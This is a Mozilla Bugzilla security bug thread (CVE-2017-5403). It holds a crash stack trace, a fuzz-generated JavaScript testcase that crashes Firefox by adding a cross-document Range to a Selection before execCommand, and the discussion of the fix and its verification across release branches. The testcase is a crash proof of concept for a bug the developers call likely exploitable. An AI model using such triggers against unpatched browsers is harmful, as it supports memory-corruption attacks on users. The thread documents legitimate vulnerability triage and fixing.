#13 0x00007fefda5ed070 in nsBlockFrame::Reflow (this=0x625000bacc80, aPresContext=0x61a000275480, aMetrics=..., aReflowInput=..., aStatus=@0x7ffc10338370: 0) at /z/moz/b/layout/generic/nsBlockFrame.cpp:1237
#14 0x00007fefda66169c in nsContainerFrame::ReflowChild (this=0x625001267240, aKidFrame=0x625000bacc80, aPresContext=0x61a000275480, aDesiredSize=..., aReflowInput=..., aWM=..., aPos=..., aContainerSize=..., aFlags=0, 
    aStatus=@0x7ffc10338370: 0, aTracker=0x0) at /z/moz/b/layout/generic/nsContainerFrame.cpp:1028
#15 0x00007fefda65fd5d in nsCanvasFrame::Reflow (this=0x625001267240, aPresContext=0x61a000275480, aDesiredSize=..., aReflowInput=..., aStatus=@0x7ffc10338370: 0) at /z/moz/b/layout/generic/nsCanvasFrame.cpp:711
#16 0x00007fefda66169c in nsContainerFrame::ReflowChild (this=0x6250012675b0, aKidFrame=0x625001267240, aPresContext=0x61a000275480, aDesiredSize=..., aReflowInput=..., aWM=..., aPos=..., aContainerSize=..., aFlags=3, 
    aStatus=@0x7ffc10338370: 0, aTracker=0x0) at /z/moz/b/layout/generic/nsContainerFrame.cpp:1028
#17 0x00007fefda78972e in nsHTMLScrollFrame::ReflowScrolledFrame (this=0x6250012675b0, aState=0x7ffc10338f50, aAssumeHScroll=false, aAssumeVScroll=false, aMetrics=0x7ffc10338b60, aFirstPass=true)
    at /z/moz/b/layout/generic/nsGfxScrollFrame.cpp:552
#18 0x00007fefda78b4d5 in nsHTMLScrollFrame::ReflowContents (this=0x6250012675b0, aState=0x7ffc10338f50, aDesiredSize=...) at /z/moz/b/layout/generic/nsGfxScrollFrame.cpp:664
#19 0x00007fefda78f009 in nsHTMLScrollFrame::Reflow (this=0x6250012675b0, aPresContext=0x61a000275480, aDesiredSize=..., aReflowInput=..., aStatus=@0x7ffc1033a8f0: 0) at /z/moz/b/layout/generic/nsGfxScrollFrame.cpp:1039
#20 0x00007fefda678770 in nsContainerFrame::ReflowChild (this=0x625001266a58, aKidFrame=0x6250012675b0, aPresContext=0x61a000275480, aDesiredSize=..., aReflowInput=..., aX=0, aY=0, aFlags=0, aStatus=@0x7ffc1033a8f0: 0, aTracker=0x0)
    at /z/moz/b/layout/generic/nsContainerFrame.cpp:1072
#21 0x00007fefda5b0dc3 in mozilla::ViewportFrame::Reflow (this=0x625001266a58, aPresContext=0x61a000275480, aDesiredSize=..., aReflowInput=..., aStatus=@0x7ffc1033a8f0: 0) at /z/moz/b/layout/generic/ViewportFrame.cpp:326
#22 0x00007fefda2c82b2 in mozilla::PresShell::DoReflow (this=0x6180000f6880, target=0x625001266a58, aInterruptible=false) at /z/moz/b/layout/base/PresShell.cpp:9260
#23 0x00007fefda2dcfb2 in mozilla::PresShell::ProcessReflowCommands (this=0x6180000f6880, aInterruptible=false) at /z/moz/b/layout/base/PresShell.cpp:9433
#24 0x00007fefda2dc599 in mozilla::PresShell::FlushPendingNotifications (this=0x6180000f6880, aFlush=...) at /z/moz/b/layout/base/PresShell.cpp:4234
#25 0x00007fefda2daaee in mozilla::PresShell::FlushPendingNotifications (this=0x6180000f6880, aType=mozilla::FlushType::Layout) at /z/moz/b/layout/base/PresShell.cpp:4073
#26 0x00007fefd42f616e in nsDocument::FlushPendingNotifications (this=0x61d001258e80, aType=mozilla::FlushType::Layout) at /z/moz/b/dom/base/nsDocument.cpp:7975
#27 0x00007fefd4016c97 in mozilla::dom::Element::GetPrimaryFrame (this=0x60e0001c0580, aType=mozilla::FlushType::Layout) at /z/moz/b/dom/base/Element.cpp:2166
#28 0x00007fefd4016b9a in mozilla::dom::Element::GetStyledFrame (this=0x60e0001c0580) at /z/moz/b/dom/base/Element.cpp:622
#29 0x00007fefd7af602d in nsGenericHTMLElement::GetOffsetRect (this=0x60e0001c0580, aRect=...) at /z/moz/b/dom/html/nsGenericHTMLElement.cpp:265
#30 0x00007fefd6c22612 in nsGenericHTMLElement::OffsetWidth (this=0x60e0001c0580) at /z/moz/b/dom/html/nsGenericHTMLElement.h:244
#31 0x00007fefd78db3b9 in nsGenericHTMLElement::GetOffsetWidth (this=0x60e0001c0580, aOffsetWidth=0x619001f20aa0) at /z/moz/b/dom/html/nsGenericHTMLElement.h:425
#32 0x00007fefd9bd81a2 in mozilla::HTMLEditor::GetPositionAndDimensions (this=0x619001f20780, aElement=0x60e0001c0600, aX=@0x619001f20a98: 8, aY=@0x619001f20a9c: 8, aW=@0x619001f20aa0: 0, aH=@0x619001f20aa4: 0, 
    aBorderLeft=@0x619001f20ab0: 0, aBorderTop=@0x619001f20ab4: 0, aMarginLeft=@0x619001f20aa8: 0, aMarginTop=@0x619001f20aac: 0) at /z/moz/b/editor/libeditor/HTMLAnonymousNodeEditor.cpp:528
#33 0x00007fefd9cb7c54 in mozilla::HTMLEditor::ShowResizersInner (this=0x619001f20780, aResizedElement=0x60e0001c0600) at /z/moz/b/editor/libeditor/HTMLEditorObjectResizer.cpp:329
#34 0x00007fefd9bd57cf in mozilla::HTMLEditor::ShowResizers (this=0x619001f20780, aResizedElement=0x60e0001c0600) at /z/moz/b/editor/libeditor/HTMLEditorObjectResizer.cpp:286
#35 0x00007fefd9bd2410 in mozilla::HTMLEditor::CheckSelectionStateForAnonymousButtons (this=0x619001f20780, aSelection=0x60d00071eb50) at /z/moz/b/editor/libeditor/HTMLAnonymousNodeEditor.cpp:431
#36 0x00007fefd9c900b2 in mozilla::HTMLEditor::EndUpdateViewBatch (this=0x619001f20780) at /z/moz/b/editor/libeditor/HTMLEditor.cpp:4821
#37 0x00007fefd9b5d126 in mozilla::EditorBase::EndPlaceHolderTransaction (this=0x619001f20780) at /z/moz/b/editor/libeditor/EditorBase.cpp:969
#38 0x00007fefd9bc0a70 in mozilla::AutoPlaceHolderBatch::~AutoPlaceHolderBatch (this=0x7ffc1033dcc0) at /z/moz/b/obj/dist/include/mozilla/EditorUtils.h:170
#39 0x00007fefd9bb6daf in mozilla::AutoEditBatch::~AutoEditBatch (this=0x7ffc1033dcc0) at /z/moz/b/obj/dist/include/mozilla/EditorUtils.h:192
#40 0x00007fefd9c7f57a in mozilla::HTMLEditor::MakeOrChangeList (this=0x619001f20780, aListType=..., entireList=false, aBulletType=...) at /z/moz/b/editor/libeditor/HTMLEditor.cpp:2041
#41 0x00007fefd9d8ff16 in nsListCommand::ToggleState (this=0x603000a90a80, aEditor=0x619001f20780) at /z/moz/b/editor/composer/nsComposerCommands.cpp:305
#42 0x00007fefd9d8b140 in nsBaseStateUpdatingCommand::DoCommand (this=0x603000a90a80, aCommandName=0x7ffc1033eaa0 "cmd_ul", refCon=0x619001f20780) at /z/moz/b/editor/composer/nsComposerCommands.cpp:92
#43 0x00007fefd744785b in nsControllerCommandTable::DoCommand (this=0x6080001deea0, aCommandName=0x7ffc1033eaa0 "cmd_ul", aCommandRefCon=0x619001f20780) at /z/moz/b/dom/commandhandler/nsControllerCommandTable.cpp:147
#44 0x00007fefd743d99e in nsBaseCommandController::DoCommand (this=0x6070003bc460, aCommand=0x7ffc1033eaa0 "cmd_ul") at /z/moz/b/dom/commandhandler/nsBaseCommandController.cpp:136
#45 0x00007fefd7444675 in nsCommandManager::DoCommand (this=0x60b00025c750, aCommandName=0x7ffc1033eaa0 "cmd_ul", aCommandParams=0x0, aTargetWindow=0x6190007422a0) at /z/moz/b/dom/commandhandler/nsCommandManager.cpp:214
#46 0x00007fefd7b362bf in nsHTMLDocument::ExecCommand (this=0x61d00033e080, commandID=..., doShowUI=false, value=..., aSubjectPrincipal=..., rv=...) at /z/moz/b/dom/html/nsHTMLDocument.cpp:3240
#47 0x00007fefd6af2040 in mozilla::dom::HTMLDocumentBinding::execCommand (cx=0x61f000004680, obj=..., self=0x61d00033e080, args=...) at /z/moz/b/obj/dom/bindings/HTMLDocumentBinding.cpp:835
#48 0x00007fefd6f5e5a2 in mozilla::dom::GenericBindingMethod (cx=0x61f000004680, argc=3, vp=0x6210002b2190) at /z/moz/b/dom/bindings/BindingUtils.cpp:2951
#49 0x00007fefdff47491 in js::CallJSNative (cx=0x61f000004680, native=0x7fefd6f5de10 <mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*)>, args=...) at /z/moz/b/js/src/jscntxtinlines.h:281
...
Flags: needinfo?(cam)
Assignee: nobody → cam
Status: NEW → ASSIGNED
I'm not sure this is related to the style system.  Masayuki, I wonder if I could pass this off to you, if you have time?

One thing that stands out to me is that the addRange() call in the test attempts to add a Range that consists of the <td> from the iframe's initial data: URI document into the Selection object for the top level document.  I don't know how accurate the current Selection API spec is but http://w3c.github.io/selection-api/#dom-selection-addrange says such requests should just be ignored.  I have no idea how well we normally handle such cross-document selection ranges.
Flags: needinfo?(masayuki)
Cleaning up the testcase for easier to read:

> <script>
> function onLoad() {
>   iframe = document.createElementNS('http://www.w3.org/1999/xhtml','iframe');
>   iframe.src = 'data:text/html,<html><body><table><tr><td id=cell>xxx</td></tr></table></body></html>';
>   iframe.addEventListener('load', onLoadOfIFrame, false);
>   document.body.appendChild(iframe);
>   parentDocument = window.document;
> }
> 
> var gCalled = 0;
> function onLoadOfIFrame() {
>   if (gCalled++) {
>     return;
>   }
>   iframeDocument = iframe.contentDocument;
>   td = iframeDocument.getElementById('cell');
>   selection = document.getSelection();
>   iframeDocument.designMode = 'on';
>   blob = new Blob([document.documentElement], {'type': 'text/html'});
>   iframe.src = window.URL.createObjectURL(blob);
>   parentDocument.designMode = 'on';
>   textarea = document.createElementNS('http://www.w3.org/1999/xhtml','textarea');
>   iframe.appendChild(textarea);
>   range = document.createRange();
>   range.selectNode(td);
>   selection.addRange(range);
>   try{
>     parentDocument.execCommand('insertunorderedlist', false, null);
>   } catch(e) {
>   }
>   window.setTimeout(reloadAfterCleanup, 4);
> }
> 
> function reloadAfterCleanup() {
>   window.fuzzPriv.CC();
>   window.fuzzPriv.GC();
>   window.fuzzPriv.CC();
>   window.setTimeout("location.reload()",500);
> }
> </script>
> <body onload="onLoad()"></body>

Yeah, if Selection adds the range of <td> simply, it sounds like a bug. As far as I checked, there is no check in Selection::AddRange() and the methods called by it. But I have some jobs in my queue and I'm not so familiar with Selection.

Mats, how about you? (I heard that you're familiar with Selection.)

# If nobody won't take this, I'll try to fix this if this is actually caused in Selection.
Flags: needinfo?(masayuki) → needinfo?(mats)
This is crashing all over the place, so I suspect it's exploitable.
Thanks for filing this Nils!

Cameron is spot on in comment 3, we need to reject ranges in AddRange that has
a different root object, as the spec says.  Here's a patch that does that:
https://treeherder.mozilla.org/#/jobs?repo=try&revision=83f7f845a013e69b04fc605ce3b42ee9e2e619cb

Given that it's fairly obvious what that patch checks, and thus how to trigger this
crash, it's probably better to land the patch in a public bug pretending it's just for
spec compliance.  I filed bug 1341137 for that.
Severity: normal → critical
Flags: needinfo?(mats)
Keywords: crash, testcase
OS: Unspecified → All
Hardware: Unspecified → All
Assignee: cam → mats
Whiteboard: [fixed by bug 1341137]
Whiteboard: [fixed by bug 1341137] → [fixed by cover bug 1341137]
Component: Editor → Selection
This code looks pretty old, so I'm going to guess it affects everything.
status-firefox51: --- → affected
status-firefox52: ?affected
status-firefox53: ?affected
status-firefox-esr45: --- → affected
status-firefox-esr52: --- → affected
Flags: sec-bounty?
Group: core-security → layout-core-security
Now fixed in mozilla-central by bug 1341137.  I've asked for branch uplifts there.
Status: ASSIGNED → RESOLVED
Closed: 7 years ago
status-firefox54: affectedfixed
Flags: in-testsuite?
Resolution: --- → FIXED
Target Milestone: --- → mozilla54
Mats, are we still trying to uplift bug 1341137 to ESR45 as well?
status-firefox52: affectedfixed
status-firefox53: affectedfixed
status-firefox-esr52: affectedfixed
tracking-firefox-esr45: --- → ?
tracking-firefox-esr52: --- → ?
Flags: needinfo?(mats)
Flags: qe-verify+
Whiteboard: [fixed by cover bug 1341137] → [fixed by cover bug 1341137][post-critsmash-triage]
> Mats, are we still trying to uplift bug 1341137 to ESR45 as well?

I honestly don't know what the status / uplift criteria is for ESR45
at this point.  But I don't see any technical reason why the same
fix wouldn't work there.  (modulo the WPT manifest thing)

You should probably ask whoever is responsible for that branch though.
Flags: needinfo?(mats)
We still care about fixing sec-high/crit bugs on ESR45. Does that help?
OK, sounds like we should take it there too then.
Too late now for ESR45.8.
Whiteboard: [fixed by cover bug 1341137][post-critsmash-triage] → [fixed by cover bug 1341137][post-critsmash-triage][adv-main52+]
Alias: CVE-2017-5403
Please request ESR45 approval on bug 1341137 so we can at least get it in for the 45.9 release in April instead :(
Flags: needinfo?(mats)
I had assumed we were doing a 2nd ESR45 build this week for this issue and for the other last minute sec-critical fix. We should, since we still support esr45.
status-firefox-esr45: affectedfixed
Flags: needinfo?(mats)
Used the following OS'es to verify the fix: Ubuntu 16.04, Windows 10 x64, Mac OSX 10.10.

Reproduced the crash with the testcase from comment 4 on Release 51.0.1 20170125094131

Then proceeded to verify the fixes as follows, using the DOMFuzz Helper addon + the testcase from comment4:

ESR 45.7.0 20170118123525 - DomFuzz Helper is incompatible
ESR 52.0 - build4 20170303022339 - verified as fixed

Nightly 54.0a1 20170302110226 - verified as fixed
Aurora 53.0a2 20170302084034 - verified as fixed
RC 52.0 -build 2 20170302120751 - verified as fixed

:mats, could you please advise a different method in order to be able to verify this fix on esr45, since I can't use the DomFuzzHelper?
status-firefox52: fixedverified
status-firefox53: fixedverified
status-firefox54: fixedverified
status-firefox-esr52: fixedverified
Flags: needinfo?(mats)
Status: RESOLVED → VERIFIED
Attached file domFuzzLite3.xpi 
> ESR 45.7.0 20170118123525 - DomFuzz Helper is incompatible

Here's an old domFuzzLite3.xpi file I had lying around.
Download it and save it somewhere on disk.  Then set the preference xpinstall.signatures.required to false (in about:config).  Now you
should be able to install it from "Install add-on from file" in
the cog wheel menu on the about:addons Extensions tab.
Flags: needinfo?(mats)
Flags: sec-bounty? → sec-bounty+
Reproduced on ESR 45.7.0 20170118123525 with DomFuzz lite that Mats provided;
Verified as fixed on 45.8.0 20170301181722; 

Based on the above, marking as verified on ESR 45 as well.
status-firefox-esr45: fixedverified
Group: layout-core-security → core-security-release
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.